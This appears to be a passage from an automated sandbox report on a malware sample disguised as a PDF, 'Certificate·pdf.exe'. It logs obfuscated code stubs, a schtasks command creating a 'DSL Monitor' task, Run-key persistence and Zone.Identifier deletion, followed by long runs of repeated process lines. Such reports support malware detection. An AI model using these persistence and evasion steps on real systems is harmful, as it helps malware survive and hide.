M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4F			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_04590F4A push 846A6749h; ret		5_2_04590F4F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_217B0E32 push 217B0FA4h; retn 0020h		5_2_217B0E3C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_217B0D8A push 217B0FA4h; retn 0024h		5_2_217B0D94
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD0973 push ss; ret		5_2_23BD0974

Persistence and Installation Behavior

Boot Survival

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup key			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
